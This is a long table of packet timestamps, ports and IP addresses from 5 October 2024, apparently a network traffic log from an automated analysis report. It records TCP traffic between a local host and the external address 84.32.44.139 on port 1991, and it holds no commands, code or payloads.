                                                                                                                          Oct 5, 2024 14:58:28.937536001 CEST491711991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:28.937576056 CEST491711991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:28.938807964 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.938848972 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.938883066 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.938911915 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.939173937 CEST491711991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:28.942476034 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.942919016 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.942960024 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.942996025 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.944217920 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.944253922 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.944348097 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.944375992 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.944403887 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.944647074 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.944675922 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.945892096 CEST491711991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:28.948407888 CEST491711991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:28.951301098 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.951342106 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.951370955 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.951431036 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.951459885 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.951488972 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.951517105 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.951550961 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.951579094 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.951606989 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.951694012 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.951723099 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.951750040 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.951776981 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.953648090 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.953691006 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.953722000 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.953751087 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.953807116 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.953835964 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.953865051 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.953891993 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.953919888 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.953948021 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.953974962 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.954001904 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.954029083 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.954062939 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.958544016 CEST491711991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:28.961080074 CEST491711991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:28.963841915 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.963879108 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.963907003 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.963933945 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.963989019 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.964016914 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.964046001 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.964224100 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.964255095 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.964282036 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.964309931 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.964337111 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.964365005 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.964392900 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.965961933 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.966025114 CEST491711991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:28.966084003 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.966116905 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.966144085 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.966171026 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.966245890 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.966274023 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.966417074 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.966444969 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.966471910 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.966502905 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.966530085 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.966557026 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.966583967 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.971168995 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.972244024 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.972280979 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.972352028 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.972385883 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.972421885 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.972455978 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.972476959 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:28.972476959 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:28.972491026 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.972523928 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.972559929 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.972589016 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:28.972589016 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:28.973140001 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.973268032 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.973303080 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.973314047 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:28.973397970 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:28.977859974 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.986777067 CEST491711991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:28.993268967 CEST19914917184.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:28.993463039 CEST491711991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.059202909 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.059253931 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.059276104 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.059314966 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.059349060 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.059364080 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.059411049 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.059456110 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.059525967 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.059559107 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.059592962 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.059607983 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.059916019 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.059967995 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.059968948 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.060005903 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.060039043 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.060060978 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.060076952 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.060127020 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.060733080 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.060827017 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.060861111 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.060877085 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.060895920 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.060928106 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.060944080 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.061614990 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.061666012 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.061669111 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.061702013 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.061734915 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.061752081 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.061772108 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.061820984 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.062794924 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.101217031 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.101305008 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.101341009 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.101366043 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.146003962 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.146151066 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.146184921 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.146219969 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.146255016 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.146259069 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.146259069 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.146290064 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.146336079 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.146410942 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.146464109 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.146497965 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.146542072 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.146574974 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.146627903 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.146627903 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.146627903 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.147336006 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.147478104 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.147530079 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.147550106 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.147564888 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.147598982 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.147618055 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.148260117 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.148314953 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.148315907 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.148349047 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.148396969 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.148399115 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.148432970 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.148483038 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.149111032 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.149168015 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.149204016 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.149205923 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.149230957 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.149296045 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.149333000 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.149348974 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.150085926 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.150140047 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.150187016 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.150239944 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.150274992 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.150290966 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.150310040 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.150363922 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.150948048 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.151024103 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.151076078 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.151078939 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.151114941 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.151149988 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.151165962 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.151782990 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.151839972 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.152000904 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.165756941 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.165849924 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.165884972 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.165904045 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.165920973 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.165955067 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.165970087 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.165988922 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.166038036 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.188040018 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.188281059 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.188313007 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.188337088 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.188349009 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.188385010 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.188397884 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.188420057 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.188456059 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.188466072 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.188823938 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.188875914 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.188877106 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.232801914 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.232846022 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.232866049 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.232882977 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.232919931 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.232928038 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.232954025 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.232992887 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.232995987 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.233282089 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.233330011 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.233339071 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.233374119 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.233408928 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.233417988 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.233443022 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.233489990 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.234111071 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.234164953 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.234199047 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.234209061 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.234237909 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.234275103 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.234282970 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.235023975 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.235068083 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.235105038 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.235157967 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.235193014 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.235199928 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.235229015 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.235271931 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.235914946 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.235968113 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.236001968 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.236011028 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.236262083 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.236296892 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.236304998 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.236457109 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.236793041 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.236849070 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.236882925 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.236892939 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.236969948 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.237010956 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.237010956 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.237690926 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.237734079 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.237746000 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.237780094 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.237817049 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.237822056 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.237852097 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.237890005 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.238583088 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.238637924 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.238672018 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.238686085 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.238708019 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.238743067 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.238751888 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.238796949 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.239512920 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.239547014 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.239583969 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.239589930 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.239619017 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.239660025 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.240201950 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.240256071 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.240289927 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.240298986 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.240325928 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.240360022 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.240370035 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.240947962 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.241065025 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.241117954 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.241153002 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.241168976 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.241189003 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.241221905 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.241229057 CEST491691991192.168.2.2284.32.44.139
